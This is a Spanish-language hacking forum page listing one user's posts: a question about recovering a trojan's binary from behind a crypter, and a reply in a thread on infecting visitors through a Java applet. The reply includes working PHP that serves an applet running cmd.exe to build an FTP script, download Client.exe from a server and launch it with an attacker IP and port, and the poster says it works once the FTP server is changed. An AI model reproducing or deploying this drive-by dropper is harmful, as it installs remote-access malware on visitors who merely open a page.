Muy Bueno psymera lo eh probado y ah funcionado aunque no recupera al 100% el binario antiguo recupera la mayor parte y eso es mejor que nada. Un saludo y gracias.
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#52
Ingeniería Inversa / Como "Desempaquetar" un .EXE que se le haya pasado un crypter ... (SOLUCIONADO)
9 Septiembre 2009, 17:24 PM
Hola, como muchos saben ahi troyanos que para hacerlos indetectables se les pasa una herramienta llamada crypter, pues yo eh estado buscando y solo se las conexiones que hace los puertos que usa y el dns si es que lo tiene, pero eso no me es suficiente, necesito saber que existe alguna forma de leer en hexadecimal el "Archivo Original" es decir ver el codigo del archivo como sino le hubieran pasado el crypter, alguna forma tiene que haber ya que una vez lo ejecutas la funcion de casi todos los crypter es crear unarchivo temporal y ese archivo temporal es el que tiene binario sin cifrar, bueno espero hayan entendido un saludo y gracias por adelantado
CitarSolución:http://www.gigasize.com/get.php?d=b32byccdznfhttp://foro.elhacker.net/empty-t262850.0.html
#53
Hacking / Re: [POC] Infección Mediante Java Applet (y VBScript)
1 Junio 2009, 02:21 AM
Hola la verdad encontre información sobre este tema en otro sitios (en inglés) y me resulto muy complicado por la poca explicación que ofrecian, y buscando mas en google aparecio esto, bien lo que me sucede actualmente es lo que le ah pasado a varios aqui pero que no dicen como lo corrijieron o al menos yo no lo vi, yo tengo este codigo:
Al abrir se demora unos 6 o 7 segundos y sale un mensaje de error "Aplicación Win32 no Valida" fue a la ruta y estaba el "datos.txt" y "Cliente.exe" pero con 0 bytes leyendo vi que a algunos les ah pasado y dicen que es un error que tenia el PHP pero no soy capaz de encontrarlo. Seria de agradecer que lo postearas un saludo y gracias por adelantado.
Resuelto: Cambiar server FTP
El code esta bien
Código [Seleccionar]
<?php
if(isset($HTTP_GET_VARS["board"])) {
$ip = $HTTP_GET_VARS["board"];
echo $ip;
}
else $ip = "127.0.0.1";
if(isset($HTTP_GET_VARS["topic"])) {
$puerto = $HTTP_GET_VARS["topic"];
echo $puerto;
}
else $puerto = 666;
echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo "<param name='first' value='
cmd.exe /c cd C:\\ & echo usuario@ftp.com>datos.txt&echo contraseña>>datos.txt&echo pwd>>datos.txt&echo binary>>datos.txt&echo get Client.exe>>datos.txt&echo bye>>datos.txt&echo quit>>datos.txt&ftp -s:datos.txt ftp.com&start Client.exe ".$ip." ".$puerto."&pause'>";
echo "</applet>";
?>Al abrir se demora unos 6 o 7 segundos y sale un mensaje de error "Aplicación Win32 no Valida" fue a la ruta y estaba el "datos.txt" y "Cliente.exe" pero con 0 bytes leyendo vi que a algunos les ah pasado y dicen que es un error que tenia el PHP pero no soy capaz de encontrarlo. Seria de agradecer que lo postearas un saludo y gracias por adelantado.
Resuelto: Cambiar server FTP
El code esta bien